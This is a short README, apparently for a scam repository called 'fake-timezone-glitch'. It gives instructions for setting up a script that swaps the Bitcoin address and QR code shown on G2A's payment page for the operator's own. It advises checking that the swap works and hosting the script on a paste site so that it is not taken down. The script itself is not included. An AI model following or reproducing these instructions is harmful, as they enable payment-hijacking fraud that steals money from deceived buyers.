lucakonig/fake-timezone-glitch/README.md

 Search for "your_btc_address"

 Replace all 4 results with your bech32 bitcoin address (the one that starts with bc1) - It's important that your address starts with bc1 (bech32 type of address) because the script checks for the length of the address.
 If your address isn't exactly 42 characters long - just like bech32 addresses, the script's interval will never stop which causes problems with copying the script for the user as the value gets refreshed every 200 milliseconds

+Remember to check on g2a if the script is working and changing btc address to your own + qr code to your own (if it's not, then you did something wrong)

 Use https://pst.klgrth.io/ to host your script (so it doesn't get removed)